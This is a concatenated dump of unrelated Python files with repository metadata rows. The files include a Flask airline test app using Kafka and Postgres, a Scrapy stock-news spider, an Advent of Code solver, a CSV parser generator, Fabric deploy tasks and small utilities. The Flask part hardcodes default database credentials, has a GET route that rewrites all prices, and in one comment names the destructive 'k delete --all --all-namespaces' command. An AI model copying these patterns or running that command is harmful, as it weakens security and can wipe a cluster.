    producer = KafkaProducer(bootstrap_servers='my-cluster-kafka-bootstrap:9092')
    while True:
        next_msg = "nochda"
        print(f"Sending message: {next_msg}")
        future = producer.send("1337datascience", next_msg.encode())
        result = future.get(timeout=10)
        print(f"Result: {result}")
        time.sleep(5)


############### Everything below this point is test pages ################

# Test of the cache access
@app.route('/cachetest')
def test():
    ## Fetch data from the cache server
    cache_result = client.get('flights')
    ## If no data is cached, pull it from the database
    if cache_result is None:  # flights not available
        con = psycopg2.connect("host=postgres port=5432 dbname=kranichairline_db user=postgres password=postgres")
        cur = con.cursor()
        cur.execute("select * from flights")
        data = cur.fetchall()
        cur.close()
        client.set('flights', data)
        return emoji.emojize('Daten waren nicht im Cacheserver :thumbsdown:', use_aliases=True)
    else:
        # If available, take the data from the cache
        data = cache_result
        return emoji.emojize('Daten waren im Cacheserver :thumbsup:', use_aliases=True)
    # except Exception as e:
    #     data = e
    #     return emoji.emojize('Cacheserver ist :poop:', use_aliases=True)


# Test of the database access
@app.route('/dbtest')
def dbtest():
    con = psycopg2.connect("host=postgres port=5432 dbname=kranichairline_db user=postgres password=postgres")
    cur = con.cursor()
    cur.execute("select * from flights")
    data = cur.fetchall()
    cur.close()
    return render_template('index3.html', data=data)


# Test whether the service is reachable via DNS - insert the current IP
# UPDATE 24.08.
# The DNS reachability failure was caused by "k delete --all --all-namespaces",
# which also deletes the DNS pod
@app.route('/servicetest')
def servicetest():
    try:
        con = psycopg2.connect("host=10.101.162.210 port=5432 dbname=kranichairline_db user=postgres password=postgres")
        print('+=========================+')
        print('|  CONNECTED TO DATABASE  |')
        print('+=========================+')
        # cursor = conn.cursor()
        # print("test")
        # print(cursor.execute("SELECT * FROM flights"))
        cur = con.cursor()
        cur.execute("select * from flights")
        data = cur.fetchall()
        cur.close()
        return render_template('index3.html', data=data)
    except Exception as e:
        data = e
        return emoji.emojize('Datenbank :poop:', use_aliases=True)


# Test whether the Postgres pod is reachable via IP - insert the current IP
@app.route('/podtest')
def podtest():
    try:
        con = psycopg2.connect("host=172.17.0.5 port=5432 dbname=kranichairline_db user=postgres password=postgres")
        print('+=========================+')
        print('|  CONNECTED TO DATABASE  |')
        print('+=========================+')
        # cursor = conn.cursor()
        # print("test")
        # print(cursor.execute("SELECT * FROM flights"))
        cur = con.cursor()
        cur.execute("select * from flights")
        data = cur.fetchall()
        cur.close()
        return render_template('index3.html', data=data)
    except Exception as e:
        data = e
        return emoji.emojize('Datenbank :poop:', use_aliases=True)


# Test whether the prices can be changed
@app.route('/changedb')
def changetest():
    try:
        con = psycopg2.connect("host=postgres port=5432 dbname=kranichairline_db user=postgres password=postgres")
        cur = con.cursor()
        cur.execute("UPDATE flights SET price = price + (price * 10 / 100)")
        con.commit()  # without a commit the UPDATE is rolled back on close
        cur.execute("select * from flights")
        data = cur.fetchall()
        cur.close()
        return render_template('index3.html', data=data)
    except Exception as e:
        data = e
        return emoji.emojize('Datenbank-Schreiben :poop:', use_aliases=True)


@app.route('/kafkaread')
# Test whether messages can be read
def kafkaread():
    from kafka import KafkaConsumer

    # The bootstrap server to connect to
    bootstrap = 'my-cluster-kafka-kafka-bootstrap:9092'

    # Create a consumer instance
    # cf.
    print('Starting KafkaConsumer')
    consumer = KafkaConsumer('1337datascience',  # <-- topics
                             bootstrap_servers=bootstrap)

    # Print out all received messages (note: this iterator blocks until the
    # connection is closed, so the return below is only reached on shutdown)
    data = []
    for msg in consumer:
        data.append(msg)
    return render_template('index3.html', data=data)


@app.route('/kafkaread2')
def kafkaread2():
    from kafka import KafkaConsumer

    # The bootstrap server to connect to
    bootstrap = 'my-cluster-kafka-kafka-bootstrap:9092'

    # Create a consumer instance
    # cf.
    print('Starting KafkaConsumer')
    consumer = KafkaConsumer('1337datascience',  # <-- topics
                             bootstrap_servers=bootstrap)

    # Print out all received messages
    data = []
    for msg in consumer:
        data.append(msg)
    return data
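
# Local-run sketch (an assumption: inside the cluster this app is presumably
# served by a WSGI server, so this block would only be for local debugging):
# if __name__ == '__main__':
#     app.run(host='0.0.0.0', port=5000)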
| 34.883495 | 120 | 0.655998 | 864 | 7,186 | 5.399306 | 0.271991 | 0.018864 | 0.034298 | 0.041158 | 0.67717 | 0.591211 | 0.591211 | 0.577492 | 0.577492 | 0.550054 | 0 | 0.019514 | 0.215558 | 7,186 | 205 | 121 | 35.053659 | 0.808054 | 0.263707 | 0 | 0.615385 | 0 | 0.015385 | 0.290198 | 0.074716 | 0 | 0 | 0 | 0.004878 | 0 | 1 | 0.084615 | false | 0.046154 | 0.069231 | 0.007692 | 0.269231 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8ff50e25ec705d70c94ffe8982cb388ca277e90 | 1,644 | py | Python | crawling_project/news/stock/stock/spiders/spider.py | GS-Jo/Stock_data_Crawling_NLP | 187aaf8ad50d859aed0e905ebf632e57c5cc90df | [
"MIT"
] | null | null | null | crawling_project/news/stock/stock/spiders/spider.py | GS-Jo/Stock_data_Crawling_NLP | 187aaf8ad50d859aed0e905ebf632e57c5cc90df | [
"MIT"
] | null | null | null | crawling_project/news/stock/stock/spiders/spider.py | GS-Jo/Stock_data_Crawling_NLP | 187aaf8ad50d859aed0e905ebf632e57c5cc90df | [
"MIT"
] | null | null | null | import scrapy
import re
import pandas as pd
from stock.items import StockItem


class StockSpider(scrapy.Spider):
    name = "Stock"

    def start_requests(self):
        codes = pd.read_csv("/home/ubuntu/crawling_project/news/stock_code.csv")["ISU_SRT_CD"].tolist()
        urls = [f"https://finance.naver.com/item/news_news.nhn?code={code}&page=&sm=title_entity_id.basic" for code in codes]
        for url in urls:
            yield scrapy.Request(url, callback=self.parse)

    def parse(self, response):
        page_links = response.xpath('/html/body/div/table[2]/tr/td/a/@href').extract()
        last_page = re.findall('page=([0-9]{1,4})', page_links[-1])[0]
        stock_url = str(response.url)
        for page in range(1, int(last_page) + 1):
            url = stock_url[:-25] + str(page) + stock_url[-25:]
            yield scrapy.Request(url, callback=self.parse_content1)

    def parse_content1(self, response):
        links = response.xpath('/html/body/div/table[1]/tbody/tr/td[1]/a/@href').extract()
        for link in links:
            yield scrapy.Request("https://finance.naver.com/" + link, callback=self.parse_content2)

    def parse_content2(self, response):
        item = StockItem()
        item["title"] = response.xpath('//*[@id="content"]/div[2]/table/tbody/tr[1]/th/strong/text()').extract()
        item["news"] = response.xpath('//*[@id="content"]/div[2]/table/tbody/tr[2]/th/span/text()').extract()
        item["date"] = response.xpath('//*[@id="content"]/div[2]/table/tbody/tr[2]/th/span/span/text()').extract()
        item["news_link"] = response.url
        yield item
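
# Run sketch (standard scrapy workflow; the project layout is assumed from the
# `stock.items` import above): `scrapy crawl Stock` from the project root, or
# `scrapy crawl Stock -o news.json` to dump the yielded items to a file.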
| 46.971429 | 125 | 0.621655 | 233 | 1,644 | 4.296137 | 0.364807 | 0.064935 | 0.053946 | 0.065934 | 0.271728 | 0.271728 | 0.271728 | 0.127872 | 0.127872 | 0.08991 | 0 | 0.018968 | 0.198297 | 1,644 | 34 | 126 | 48.352941 | 0.740516 | 0 | 0 | 0 | 0 | 0.172414 | 0.291971 | 0.190389 | 0 | 0 | 0 | 0 | 0 | 1 | 0.137931 | false | 0 | 0.137931 | 0 | 0.344828 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d10b3ddebcaae291c1529bf78dd66e70b434c980 | 1,142 | py | Python | day23/day23.py | Strandtasche/go-experiments | 650b3e49439792a3e4e491436676197b720726b4 | [
"MIT"
] | null | null | null | day23/day23.py | Strandtasche/go-experiments | 650b3e49439792a3e4e491436676197b720726b4 | [
"MIT"
] | null | null | null | day23/day23.py | Strandtasche/go-experiments | 650b3e49439792a3e4e491436676197b720726b4 | [
"MIT"
] | null | null | null | from typing import List
import logging

# inpt = "871369452"
inpt = "389125467"

inpt_int = [int(i) for i in inpt] + [i for i in range(10, int(1e6) + 1)]


def iterate(circle: List[int], current: int):
    # print(f"cups: {circle}")
    # print(f"current: {current}")
    current_loc = circle.index(current)
    followers_loc = [(current_loc + i) % len(circle) for i in range(1, 4)]
    followers = [circle[i] for i in followers_loc]
    for f in sorted(followers_loc, reverse=True):
        del circle[f]

    target = current - 1
    while target not in circle:
        target = (target - 1) % (len(circle) + 4)
    target_loc = circle.index(target)
    circle[target_loc + 1:target_loc + 1] = followers

    # print(f"followers: {followers}")
    # print(f"target: {target}")
    return circle, circle[(circle.index(current) + 1) % len(circle)]


pivot = inpt_int[0]
for i in range(int(1e7)):
    # print("-------------------")
    # print(f"move {i + 1}")
    inpt_int, pivot = iterate(inpt_int, pivot)
    if i % 1000 == 0:
        print("current state: " + str(i))

index_1 = inpt_int.index(1)
print(inpt_int[index_1 + 1] * inpt_int[index_1 + 2])
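
# The list-based iterate() above costs O(n) per move (list.index plus slicing),
# which is far too slow for one million cups and ten million moves. A common
# alternative (a sketch, not wired into the run above): keep the circle as a
# successor mapping where succ[c] is the cup clockwise of cup c.
def iterate_fast(succ: dict, current: int, max_label: int) -> int:
    a = succ[current]
    b = succ[a]
    c = succ[b]
    succ[current] = succ[c]           # unlink the three picked-up cups
    dest = current - 1 or max_label
    while dest in (a, b, c):
        dest = dest - 1 or max_label
    succ[c] = succ[dest]              # splice the three cups in after dest
    succ[dest] = a
    return succ[current]              # the new current cup

# Usage sketch (run instead of the loop above, on a fresh cup list):
#   succ = {c: n for c, n in zip(inpt_int, inpt_int[1:] + inpt_int[:1])}
#   cur = inpt_int[0]
#   for _ in range(int(1e7)):
#       cur = iterate_fast(succ, cur, len(inpt_int))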
| 31.722222 | 73 | 0.619089 | 172 | 1,142 | 4.005814 | 0.261628 | 0.071118 | 0.043541 | 0.030479 | 0.040639 | 0 | 0 | 0 | 0 | 0 | 0 | 0.051054 | 0.211033 | 1,142 | 35 | 74 | 32.628571 | 0.713652 | 0.161121 | 0 | 0 | 0 | 0 | 0.02529 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0 | 0.086957 | 0 | 0.173913 | 0.086957 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d10ed065807744c36942dc81208ae7f3ce88e544 | 3,225 | py | Python | src/main.py | myuanz/fastest-csv-parser-generator | 05a804be9242132e42c0957000b9ea40b6e3143b | [
"BSD-2-Clause"
] | null | null | null | src/main.py | myuanz/fastest-csv-parser-generator | 05a804be9242132e42c0957000b9ea40b6e3143b | [
"BSD-2-Clause"
] | null | null | null | src/main.py | myuanz/fastest-csv-parser-generator | 05a804be9242132e42c0957000b9ea40b6e3143b | [
"BSD-2-Clause"
] | null | null | null | from csv_types import *


class CSVRowDef:
    def __init__(self, row_items: list[CSVItemType], sep=',', ignore_blank=False, current_col_name='current_col') -> None:
        assert len(sep) == 1, 'only use 1-length sep'
        self.sep = sep
        self.row_items = row_items
        self.ignore_blank = ignore_blank
        self.current_col_name = current_col_name

    @staticmethod
    def _generate_switch(switch_from: str, case_contents: dict[str, str], default_content: str = ''):
        # keys and values of case_contents are plain strings (case labels and
        # case bodies), so the annotation is dict[str, str]
        cases = ''
        for k, v in case_contents.items():
            cases += f"case {k}: \n{v}\nbreak;\n"
        default = ''
        if default_content:
            default = f'default: \n{default_content}\nbreak;'
        return '''switch (%(switch_from)s) {
%(cases)s
%(default)s
}
''' % {'switch_from': switch_from, 'cases': cases, 'default': default}

    def generate(self):
        _enums = [i.get_enum_name() for i in self.row_items]
        enums = '''enum col_item {\n %s\n}\n''' % (', '.join(_enums)) + ';'

        open_file = f'''
boost::iostreams::mapped_file mmap(file_name, boost::iostreams::mapped_file::readonly);
auto f = mmap.const_data();
auto l = f + mmap.size();
'''
        declarations = (
            "\n".join([i.get_declaration() for i in self.row_items]) +
            '\n' +
            f'int {self.current_col_name} = 0;\n'
        )

        switch_next_item_contents = []
        for i, e in zip(self.row_items, _enums[1:]):
            switch_next_item_contents.append(
                i.switch_next_item() + '\n' + f'{self.current_col_name} = {e};'
            )
        switch_next_item_switch = self._generate_switch(
            self.current_col_name,
            dict([(e, c) for e, c in zip(_enums[:-1], switch_next_item_contents)])
        )

        on_line_end = "\n".join([i.line_end() for i in self.row_items])

        match_item_contents = [i.match_item(self.current_col_name) for i in self.row_items]
        match_item_contents_switch = self._generate_switch(
            self.current_col_name,
            dict([(e, m) for e, m in zip(_enums, match_item_contents)])
        )

        # note: `f++;` must sit after the switch (a `break` would otherwise
        # skip it and loop forever), and each case needs its own `break` so
        # the separator case does not fall through into the newline case
        main_loop = '''
%(open_file)s
%(declarations)s
while (f && f != l) {
    switch (*f) {
    case %(sep)d: // sep is [%(sep_char)s]
        %(switch_next_item_switch)s
        break;
    case '\\n':
        %(last_switch_next)s
        %(on_line_end)s
        break;
    default:
        %(match_item_contents_switch)s
        break;
    }
    f++;
}
''' % {
            'sep': ord(self.sep), 'sep_char': self.sep,
            'switch_next_item_switch': switch_next_item_switch,
            'last_switch_next': self.row_items[-1].switch_next_item(),
            'on_line_end': on_line_end + f'{self.current_col_name} = {_enums[0]};',
            'match_item_contents_switch': match_item_contents_switch,
            'open_file': open_file,
            'declarations': declarations
        }

        codes = '''
#include <cstdint>
#include <boost/iostreams/device/mapped_file.hpp>
%(enums)s
void parser(char* file_name) {
%(main_loop)s
}
''' % {'enums': enums, 'main_loop': main_loop}
        return codes
return codes | 30.714286 | 122 | 0.571163 | 416 | 3,225 | 4.110577 | 0.233173 | 0.064327 | 0.073684 | 0.073684 | 0.204678 | 0.154386 | 0.111111 | 0.095906 | 0.095906 | 0.054971 | 0 | 0.003034 | 0.284651 | 3,225 | 105 | 123 | 30.714286 | 0.738188 | 0 | 0 | 0.024096 | 0 | 0 | 0.33819 | 0.096714 | 0 | 0 | 0 | 0 | 0.012048 | 1 | 0.036145 | false | 0 | 0.012048 | 0 | 0.084337 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d10f0b3585d9401cf911c5fd65e366242490092d | 5,169 | py | Python | fapistrano/deploy.py | liwushuo/fapistrano | 2a31aad01a04d7ea9108dc6f95aee9a53290459f | [
"MIT"
] | 18 | 2016-03-25T09:40:20.000Z | 2022-02-23T02:09:50.000Z | fapistrano/deploy.py | liwushuo/fapistrano | 2a31aad01a04d7ea9108dc6f95aee9a53290459f | [
"MIT"
] | null | null | null | fapistrano/deploy.py | liwushuo/fapistrano | 2a31aad01a04d7ea9108dc6f95aee9a53290459f | [
"MIT"
] | 3 | 2016-03-22T07:41:15.000Z | 2021-02-25T04:27:53.000Z | # -*- coding: utf-8 -*-

from fabric.api import (
    runs_once, env, cd,
    task, abort, show, prefix,
)
from fabric.contrib.files import exists, append
from fabric.context_managers import shell_env

from .utils import green_alert, run_function, run
from .configuration import with_configs
from .directory import (
    get_current_release, get_previous_release,
    get_linked_files, get_linked_file_dirs,
    get_linked_dirs, get_linked_dir_parents,
    get_outdated_releases,
)
from . import signal


@task
@with_configs
def restart():
    signal.emit('deploy.restarting')
    signal.emit('deploy.restarted')


@task
@with_configs
def release():
    green_alert('Starting')
    signal.emit('deploy.starting')
    run_function(_start_deploy)
    green_alert('Started')
    signal.emit('deploy.started')

    green_alert('Updating')
    signal.emit('deploy.updating')
    green_alert('Updated')
    signal.emit('deploy.updated')

    green_alert('Publishing')
    signal.emit('deploy.publishing')
    run_function(_symlink_current)
    green_alert('Published')
    signal.emit('deploy.published')

    green_alert('Finishing')
    signal.emit('deploy.finishing')
    run_function(_cleanup)
    green_alert('Finished')
    signal.emit('deploy.finished')


@task
@with_configs
def resetup_repo():
    with cd('%(current_path)s' % env):
        signal.emit('git.building')
        signal.emit('git.built')


@task
@with_configs
def rollback():
    green_alert('Starting')
    signal.emit('deploy.starting')
    env.rollback_from = get_current_release()
    env.rollback_to = get_previous_release()
    env.release_path = '%(releases_path)s/%(rollback_to)s' % env
    run_function(_check_rollback_to)
    green_alert('Started')
    signal.emit('deploy.started')

    green_alert('Reverting')
    signal.emit('deploy.reverting')
    green_alert('Reverted')
    signal.emit('deploy.reverted')

    green_alert('Publishing')
    signal.emit('deploy.publishing')
    run_function(_symlink_current)
    green_alert('Published')
    signal.emit('deploy.published')

    green_alert('Finishing rollback')
    signal.emit('deploy.finishing_rollback')
    run_function(_cleanup_rollback)
    green_alert('Finished')
    signal.emit('deploy.finished')


@task
@with_configs
def once():
    green_alert('Running')
    with cd(env.current_path), shell_env(**env.environment), show('output'):
        run_function(_run_command)
    green_alert('Ran')


@task
@with_configs
def shell():
    with cd(env.current_path), shell_env(**env.environment), show('output'):
        run_function(_run_shell)


def _run_command():
    if env.run_command:
        run(env.run_command)


def _run_shell():
    if exists('venv/bin/activate'):
        with prefix('source venv/bin/activate'):
            if exists('manage.py'):
                run('python manage.py shell')
                return
            elif exists('venv/bin/ipython'):
                run('venv/bin/ipython')
                return
            elif exists('venv/bin/python'):
                run('venv/bin/python')
                return
    else:
        abort('Sorry, currently only Python shells are supported.')


def _start_deploy():
    _check()
    _write_env()
    _symlink_shared_files()


def _write_env():
    if not env.environment:
        return
    for env_key, env_value in env.environment.items():
        env.env_line = 'export %s="%s"' % (env_key, env_value)
        run("echo '%(env_line)s' >> $(echo '%(environment_file)s')" % env)
    if not exists(env.environment_file):
        run('touch %(environment_file)s' % env)


def _check():
    run('mkdir -p %(path)s/{releases,shared/log}' % env)
    if env.shared_writable:
        run('chmod -R g+w %(shared_path)s' % env)
    run('mkdir -p %(release_path)s' % env)
    for linked_file_dir in get_linked_file_dirs():
        dir = '%(release_path)s/' % env
        dir += linked_file_dir
        run('mkdir -p %s' % dir)
    for linked_dir_parent in get_linked_dir_parents():
        dir = '%(release_path)s/' % env
        dir += linked_dir_parent
        run('mkdir -p %s' % dir)


def _symlink_shared_files():
    for linked_file in get_linked_files():
        env.linked_file = linked_file
        if exists('%(release_path)s/%(linked_file)s' % env):
            run('rm %(release_path)s/%(linked_file)s' % env)
        run('ln -nfs %(shared_path)s/%(linked_file)s %(release_path)s/%(linked_file)s' % env)
    for linked_dir in get_linked_dirs():
        env.linked_dir = linked_dir
        if exists('%(release_path)s/%(linked_dir)s' % env):
            run('rm -rf %(release_path)s/%(linked_dir)s' % env)
        run('ln -nfs %(shared_path)s/%(linked_dir)s %(release_path)s/%(linked_dir)s' % env)


def _symlink_current():
    run('ln -nfs %(release_path)s %(current_path)s' % env)


def _check_rollback_to():
    if not env.release_path:
        abort('No release to rollback')


def _cleanup_rollback():
    run('rm -rf %(releases_path)s/%(rollback_from)s' % env)


def _cleanup():
    with cd(env.releases_path):
        outdated_releases = get_outdated_releases()
        if outdated_releases:
            run('rm -rf %s' % ' '.join(outdated_releases))
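
# Invocation sketch (standard Fabric 1.x workflow for the @task functions
# above; host/role configuration lives in the project's fabfile, not here):
#   fab release    # full deploy: start -> update -> publish -> cleanup
#   fab rollback   # symlink the previous release back and drop the failed one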
| 26.921875 | 93 | 0.653898 | 677 | 5,169 | 4.728213 | 0.177253 | 0.06248 | 0.089972 | 0.033739 | 0.332396 | 0.307092 | 0.302093 | 0.243049 | 0.211809 | 0.162449 | 0 | 0.000244 | 0.207971 | 5,169 | 191 | 94 | 27.062827 | 0.781632 | 0.004063 | 0 | 0.293333 | 0 | 0 | 0.259425 | 0.076953 | 0 | 0 | 0 | 0 | 0 | 1 | 0.106667 | false | 0 | 0.046667 | 0 | 0.18 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d11235940d45fbdbf83f4f7d5897d21befb35f6f | 1,553 | py | Python | ampel/log/handlers/RecordBufferingHandler.py | mafn/Ampel-core | 744acbf36f0a2ceae7230ceab1350236c1501b57 | [
"BSD-3-Clause"
] | null | null | null | ampel/log/handlers/RecordBufferingHandler.py | mafn/Ampel-core | 744acbf36f0a2ceae7230ceab1350236c1501b57 | [
"BSD-3-Clause"
] | null | null | null | ampel/log/handlers/RecordBufferingHandler.py | mafn/Ampel-core | 744acbf36f0a2ceae7230ceab1350236c1501b57 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# File:                Ampel-core/ampel/logging/handlers/RecordBufferingHandler.py
# License:             BSD-3-Clause
# Author:              valery brinnel <firstname.lastname@gmail.com>
# Date:                25.09.2018
# Last Modified Date:  09.05.2020
# Last Modified By:    valery brinnel <firstname.lastname@gmail.com>

from typing import Union
from logging import LogRecord, WARNING
from ampel.log.LightLogRecord import LightLogRecord


class RecordBufferingHandler:
    """
    MemoryHandler-like class whose buffer can grow indefinitely.
    The standard memory handler provided by logging (BufferingHandler) uses a value
    called 'capacity' which, once reached, triggers the flush() method when new log
    records are emitted. Since we trust ourselves to do things right (to never let
    the buffer grow indefinitely), we forgo that safety measure.
    Known subclasses: DefaultRecordBufferingHandler, ChanRecordBufHandler, EnclosedChanRecordBufHandler
    """

    __slots__ = 'buffer', 'level', 'has_error', 'warn_lvl'

    def __init__(self, level: int) -> None:
        self.buffer: list[LogRecord | LightLogRecord] = []
        self.level = level
        self.has_error = False
        self.warn_lvl = WARNING

    def flush(self) -> None:
        """ Flushing just means erasing the buffered log records """
        self.buffer = []
        self.has_error = False

    def handle(self, record: LogRecord | LightLogRecord) -> None:
        if record.levelno >= self.level:
            self.buffer.append(record)
            if record.levelno > self.warn_lvl:
                self.has_error = True
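
# Usage sketch (the handler is duck-typed rather than a logging.Handler
# subclass, so callers drive it directly; the consumer below is hypothetical):
#
#   buf = RecordBufferingHandler(level=WARNING)
#   buf.handle(some_record)       # kept only if record.levelno >= WARNING
#   if buf.has_error:
#       forward(buf.buffer)       # e.g. persist or re-emit the buffered records
#   buf.flush()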
| 33.76087 | 107 | 0.721185 | 196 | 1,553 | 5.637755 | 0.602041 | 0.028959 | 0.032579 | 0.054299 | 0.068778 | 0.068778 | 0 | 0 | 0 | 0 | 0 | 0.014184 | 0.182872 | 1,553 | 45 | 108 | 34.511111 | 0.85658 | 0.562138 | 0 | 0.111111 | 0 | 0 | 0.042945 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.166667 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d112e2b6931dcd67c1b4fc198e4cafd8b1763528 | 1,059 | py | Python | res/dbg_vis.py | MrShiposha/mcrr-tree | fb7f1196fcfe48e10feafb116e947c938414f1a8 | [
"MIT"
] | null | null | null | res/dbg_vis.py | MrShiposha/mcrr-tree | fb7f1196fcfe48e10feafb116e947c938414f1a8 | [
"MIT"
] | 1 | 2020-10-04T03:05:48.000Z | 2020-10-04T03:05:48.000Z | res/dbg_vis.py | MrShiposha/lr-tree | fb7f1196fcfe48e10feafb116e947c938414f1a8 | [
"MIT"
] | null | null | null | import re
import lldb


def print_rust_str(debugger, command, result, internal_dict):
    mem_threshold = 16384
    var = command
    ci = debugger.GetCommandInterpreter()
    res = lldb.SBCommandReturnObject()

    ci.HandleCommand("po {}.vec.len".format(var), res)
    if not res.Succeeded():
        result.SetError("dbg-vis {}".format(res.GetError()))
        return

    read_len = int(res.GetOutput())
    if read_len > mem_threshold:
        result.SetError("Unable to read {} bytes (threshold = {})".format(
            read_len,
            mem_threshold
        ))
        return

    ci.HandleCommand(
        "me read -s1 -fa -c{} {}.vec.buf.ptr.pointer --force".format(
            read_len,
            var
        ),
        res
    )
    if not res.Succeeded():
        result.SetError("dbg-vis {}".format(res.GetError()))
        return

    output = res.GetOutput()
    hex_regex = r'0x(\d|[A-Fa-f])+'
    begin_regex = r'(^|\n){hex}: '.format(hex=hex_regex)
    output = re.sub(begin_regex, '', output)
    print(output, file=result)
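
# Registration sketch (the usual lldb Python-command hookup; the command name
# is an assumption, since the original __lldb_init_module is not shown here):
# def __lldb_init_module(debugger, internal_dict):
#     debugger.HandleCommand(
#         'command script add -f dbg_vis.print_rust_str print-rust-str')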
| 24.068182 | 74 | 0.580737 | 126 | 1,059 | 4.769841 | 0.468254 | 0.046589 | 0.026622 | 0.036606 | 0.219634 | 0.219634 | 0.219634 | 0.219634 | 0.219634 | 0.219634 | 0 | 0.009091 | 0.272899 | 1,059 | 43 | 75 | 24.627907 | 0.771429 | 0 | 0 | 0.272727 | 0 | 0 | 0.144476 | 0.020774 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030303 | false | 0 | 0.060606 | 0 | 0.181818 | 0.060606 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d113b020e79c04b4a005e8fbda9c59f7bbf8c0b1 | 1,473 | py | Python | setup.py | pygfx/pyshader | 804f2a63221b40434ebcbeb4a01eeebe0d361a90 | [
"BSD-2-Clause"
] | 48 | 2020-07-19T15:55:08.000Z | 2022-03-21T15:02:45.000Z | setup.py | almarklein/python-shader | 804f2a63221b40434ebcbeb4a01eeebe0d361a90 | [
"BSD-2-Clause"
] | 22 | 2019-12-31T16:01:28.000Z | 2020-06-15T20:03:58.000Z | setup.py | almarklein/spirv-py | 804f2a63221b40434ebcbeb4a01eeebe0d361a90 | [
"BSD-2-Clause"
] | 2 | 2020-10-12T09:42:28.000Z | 2021-03-04T08:20:19.000Z | from setuptools import find_packages, setup


def get_version_and_docstring():
    ns = {"__doc__": "", "__version__": ""}
    docStatus = 0  # Not started, in progress, done
    for line in open("pyshader/__init__.py").readlines():
        if line.startswith("__version__"):
            exec(line.strip(), ns, ns)
        elif line.startswith('"""'):
            if docStatus == 0:
                docStatus = 1
                line = line.lstrip('"')
            elif docStatus == 1:
                docStatus = 2
        if docStatus == 1:
            ns["__doc__"] += line.rstrip() + "\n"
    return ns["__version__"], ns["__doc__"]


version, doc = get_version_and_docstring()

setup(
    name="pyshader",
    version=version,
    url="https://github.com/pygfx/pyshader",
    description="Write modern GPU shaders in Python!",
    long_description=doc,
    long_description_content_type="text/markdown",
    author="Almar Klein",
    author_email="almar.klein@gmail.com",
    packages=find_packages(
        exclude=["tests", "tests.*", "examples_py", "examples_py.*"]
    ),
    python_requires=">=3.6.0",
    zip_safe=True,
    classifiers=[
        "Development Status :: 3 - Alpha",
        "Intended Audience :: Developers",
        "License :: OSI Approved :: BSD License",
        "Programming Language :: Python :: 3",
        "Topic :: Software Development :: Libraries :: Python Modules",
        "Topic :: Scientific/Engineering :: Visualization",
    ],
)
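
# Install sketch (standard setuptools workflow, nothing pyshader-specific
# assumed): run `pip install .` from the repository root, or `pip install -e .`
# for a development install that picks up local edits without reinstalling.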
| 32.021739 | 71 | 0.592668 | 154 | 1,473 | 5.376623 | 0.577922 | 0.018116 | 0.031401 | 0.05314 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010092 | 0.260014 | 1,473 | 45 | 72 | 32.733333 | 0.749541 | 0.020367 | 0 | 0 | 0 | 0 | 0.33796 | 0.02984 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025 | false | 0 | 0.025 | 0 | 0.075 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d11455c8d4927ecd28e1f0ac9c54300b6beed02f | 23,636 | py | Python | document_merge_service/api/tests/test_template.py | ganwell/document-merge-service | 94b7cd2e46a244047efe7a45a16d997431b2c12f | [
"MIT"
] | null | null | null | document_merge_service/api/tests/test_template.py | ganwell/document-merge-service | 94b7cd2e46a244047efe7a45a16d997431b2c12f | [
"MIT"
] | null | null | null | document_merge_service/api/tests/test_template.py | ganwell/document-merge-service | 94b7cd2e46a244047efe7a45a16d997431b2c12f | [
"MIT"
] | null | null | null | import io
import json

import pytest
from django.urls import reverse
from docx import Document
from lxml import etree
from rest_framework import status

from document_merge_service.api.data import django_file

from .. import models, serializers


@pytest.mark.parametrize(
    "template__group,group_access_only,size",
    [(None, False, 2), ("admin", True, 2), ("unknown", True, 1), ("unknown", False, 2)],
)
